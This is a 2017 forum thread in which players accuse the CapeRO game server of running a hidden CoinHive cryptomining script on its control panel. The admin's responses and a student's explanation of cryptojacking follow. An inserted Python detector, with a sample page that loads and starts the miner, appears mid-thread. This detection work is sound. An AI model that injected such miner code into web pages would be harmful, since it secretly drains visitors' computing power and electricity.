CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency

Started by Fluorite~, Dec 30, 2017, 09:53 PM


Fluorite~

Upon accessing CapeRO's website, I was alerted by my antivirus that it had stopped a CoinHive script from running.  After checking the page source, there is definitely a CoinHive script integrated on its Main Page/Patcher.
https://i.imgur.com/U4Jad9W.png

For those of you who are unaware, CoinHive is a Javascript that activates when a user accesses a webpage.  When it runs, it does so without the user's permission and consumes their processor's resources in a cryptocurrency mining operation.
https://blog.malwarebytes.com/security-world/2017/10/why-is-malwarebytes-blocking-coinhive/
https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/

When the admin was asked about it, CapeRO said it was "a common problem with Ragnarok Thor Patchers + Windows Update" (it isn't) and seemed to suggest it was the fault of viruses present in a player, closing the topic shortly afterwards.
https://cape-ro.com/forum/index.php?/topic/283-troyan-inside-cape-ro-patcher/?p=1561
Image copies of the discussion:
https://i.imgur.com/dALXcpo.png
https://i.imgur.com/mPbnojY.png

I can understand the need for income when running an RO server, but unauthorized usage of your unsuspecting userbase's computers is not a path to walk down.

CapeRO

We checked the patcher files and couldn't even find this. Based on the domain in your screenshot, it's not even the patcher's domain. That's the Control Panel's domain. Maybe you should link us to the actual findings rather than accusing us of doing this purposely. We have bought an SSL Certificate to give extra assurance to our players. We have no idea where this is coming from. If you have a good source of accurate information then let us know, because we didn't build this website ourselves; it's a pre-made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find something we'll definitely fix it right away.

ps: If you're a legit forum member, you'll know that every time I answer reports / suggestions I close the topic right away to keep the forum clean at all times.

Update#1: The report was about the Patcher, which we found nothing wrong with.
Update#2: This issue might be something to do with the Control Panel. We will investigate further.
Update#3: The website has been put under maintenance for re-construction and fixing of whatever error there is.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

I don't know about the patcher, but it's definitely on the main control panel, starting at line 63 in the page source (view-source:https://cape-ro.com/cp/). I was keeping an eye on this server, sad to see.

Fluorite~

Wouldn't know too much about the Patcher's files themselves (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits any time someone executes it. The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.


CapeRO

Quote from: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files themselves (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits any time someone executes it. The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

I see, so you basically just randomly figured out that there is a problem with the patcher without even trying it. Is it really strange to tell them that if I found nothing wrong with the Server's Patcher? Thor patchers do have problems with anti-viruses because they detect it as a false alarm. If the report was on point and showed the bug then we would have fixed it right away. The problem wasn't coming from the Thor Patcher but the website coding itself. It did not affect anybody and no harm was done. We're just putting the site / cp on maintenance to make sure everything will be alright and safe.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their PC for mining without permission, same as if it was opened in a browser. How can you say no harm was done? It's still on the cp regardless of whether it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Fluorite~

Why would anyone even attempt to download a Patcher that is suspected to be infected...?

As for it being an issue with Windows Defender + Thor Patchers, that is horribly misinformed. When there are issues with Thor Patchers being detected as trojans, it's a detected issue with the Patcher's files themselves, not a BitCoin miner like CoinHive as stated in the forum report. Elvarion and Puddles in that forum report even gave huge leads as to what the real problem was before it was closed. It was negligent to throw that under the umbrella statement of being a false positive detection and move on.

Regardless, the website has/had an active CoinHive Javascript for any visitors. Whether it's yours or not is not something I can confirm, but it was positively running on your website and tapping into their computers' resources as a result. It's good of you to respond to the problem immediately.

CapeRO

Quote from: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their PC for mining without permission, same as if it was opened in a browser. How can you say no harm was done? It's still on the cp regardless of whether it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Oh, did someone already tell you they lost anything? As far as I'm concerned there's not a single report given to me that they have lost anything. If someone did, I would take full responsibility, and like I mentioned in the previous comment, "We have bought an SSL Certificate", which RO Private sites rarely bother buying.

We are doing our job right now. The website will be back LIVE tonight, fixed and cleaner. Not sure if you guys will continue the issue but it's being taken care of carefully.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

Quote from: CapeRO on Dec 30, 2017, 11:32 PM
Oh, did someone already tell you they lost anything? As far as I'm concerned there's not a single report given to me that they have lost anything. If someone did, I would take full responsibility, and like I mentioned in the previous comment, "We have bought an SSL Certificate", which RO Private sites rarely bother buying.

We are doing our job right now. The website will be back LIVE tonight, fixed and cleaner. Not sure if you guys will continue the issue but it's being taken care of carefully.

I'm not sure if you're being willfully ignorant or not of the extra strain it puts on people's PCs to mine bitcoin, along with power consumption. A lot of RO players run on old clunky PCs or toasters. That extra strain could easily mess up their PC's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself? Most people are unaware of these risks, and that's why they are targets of things like coin.hive.

CapeRO

Quote from: Kurisuga on Dec 30, 2017, 11:38 PM
I'm not sure if you're being willfully ignorant or not of the extra strain it puts on people's PCs to mine bitcoin, along with power consumption. A lot of RO players run on old clunky PCs or toasters. That extra strain could easily mess up their PC's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself? Most people are unaware of these risks, and that's why they are targets of things like coin.hive.

I also run on an old chunky PC myself, or "toasters". I have no idea what this coin-hive is, but it sounds like some online currency, so if people lose whatever currency that is then that's how we basically find out. We're not even sure if this is functioning or what, so we can't judge if anybody is infected or not by just brainstorming it.

But we are doing what we need to do. We're fixing whatever issue there is.

PS: I don't get the accusations really. Why would we install SSL Certificates if this was intentional?
"SSL Certificates are small data files that digitally bind a cryptographic key to an organization's details. When installed on a web server, it activates the padlock and the https protocol (over port 443) and allows secure connections from a web server to a browser."

Update 1: I just read the info about it, so it's not about losing people's currency. Still not sure how it functions but it's being dealt with.
Update 2: I run on a chunky PC and never experience slowing down. (I visit this site like 1,000 times a day.)

Thanks for reporting this and actions are being worked on.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Kurisuga

The script makes the PC "create" the online currency by solving very long and taxing algorithms at the expense of their GPU/CPU use. The currency created goes into the pockets of whoever infected the control panel, at the expense of the website visitors' power bill and PC processing power, which could overtax the parts over time. Sorry about the accusations, but it just really is damaging, especially because the majority of people won't ever know they were being taken advantage of in the first place.

CapeRO

Yeah I just read the information about it.

Thank you everybody for your concern. The website has been put under maintenance for a full check & fixing. I'll give an update when it's back.
If anybody has further issues please contact me at [email protected]. Regards.

ps: WEBSITE IS SAFE to browse as we have taken down the CP. (Check all you want.)
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.

Parachute

I have not downloaded the server's patcher nor visited your site. Not to mention, I don't know where you installed your thor patcher, but in my case, I got this report accessing your site just now:

https://forumcgamershub-com-s3.s3.amazonaws.com/original/2X/6/6dd744dd6d53b4197d731a801786773ee45a0d68.png

Meaning regardless of whether you put your website under maintenance, the damage has already been done. Your domain name has been listed as an infected site.

I'm not here to put more drama on this thread, but to give some advice as a Cybersecurity student. Please contact (uhm, a lot of) anti-malware protection companies/sites, as they have considered and listed your site as a dangerous webpage. If your users could not see this notice, then they probably don't have decent protection on their devices/browsers. If they do, they may not be able to access your site without a warning and you might lose some interested players. So, 2 probable solutions:

1. Contact A LOT of anti-malware companies
2. Change your domain name

Having HTTPS (SSL) does not protect your website from these attacks. SSL establishes an encrypted link between your user's browser and your website to make sure all data passed between them remains private. That's the main reason why it's generally installed on shops' checkout and cart webpages. But in no way does an SSL certificate protect your site from these types of attacks (if you have been the victim of such). You can even pay for a much more expensive certificate and still be vulnerable to these kinds of threats. In this case, there's a totally different protection for that.

Due to the recent growth of cryptocurrency, here comes the new trend for the past 3 months called "Cryptojacking." And yes, one of its pioneers is a company called CoinHive. What it does is self-explanatory: it secretly uses the user's laptop, PC or even mobile devices to mine cryptocurrency whenever you visit an infected site. But ofc, anti-malware companies are not slow on their side; they instantly detected this. But the only thing I do not understand: usually hackers tend to attack and infect big websites with a bunch of daily user visitors, not an RO website. So I just hope you did not add this javascript, which as it seems you have no idea how it got there. Either way, there has to be a culprit.
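Since the thread turns on a miner script sitting in the control panel's page source and on Parachute's point that HTTPS does nothing against a script the site itself serves, here is an added example, not from this thread or from CapeRO's site, of a small detector that scans a page's HTML for the CoinHive library host and its public constructor names and reports the source line of each hit. The sample HTML, its line numbers and the site key are constructed; the host and API names are the ones CoinHive's public library used, and the sets are meant to be extended for other miner families.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host that served CoinHive's miner library and the constructors its public API
# exposed; extend both for other miner families.
MINER_HOSTS = {"coinhive.com"}
MINER_API_RE = re.compile(r"\bCoinHive\.(Anonymous|User|Token)\s*\(")

# Constructed sample source: one benign script, then an injected miner (placeholder key).
SAMPLE_PAGE = """<script src="/js/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
miner.start();
</script>"""

class MinerScanner(HTMLParser):
    """Records (line, kind, detail) for <script> tags that load or start a miner."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_line = None  # line of the <script> tag currently being read
        self._script_body = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._script_line = self.getpos()[0]
        self._script_body = []
        src = dict(attrs).get("src") or ""
        host = (urlparse(src).hostname or "").lower()  # handles //host/... too
        if host in MINER_HOSTS:
            self.findings.append((self._script_line, "external miner library", src))

    def handle_data(self, data):
        if self._script_line is not None:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_line is not None:
            m = MINER_API_RE.search("".join(self._script_body))
            if m:
                self.findings.append((self._script_line, "inline miner start", m.group(0)))
            self._script_line = None

def scan_html(html):
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Run it over a saved copy of the page source (the same text a browser shows under view-source) rather than over a rendered page, since the miner tag is what the server sent, whether or not the connection used HTTPS.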

CapeRO

Thanks for the advice, I will make contact with anti-malware companies. I have deleted all other files except the Forums and cleaned it up. The only issue would be the one you posted above about the warning. I'm not sure either why they would have an interest in an RO website, but hopefully our fix will solve all the issues. Regards.
www.cape-ro.com

20x/20x/10x - 99/70 - Pre-renewal.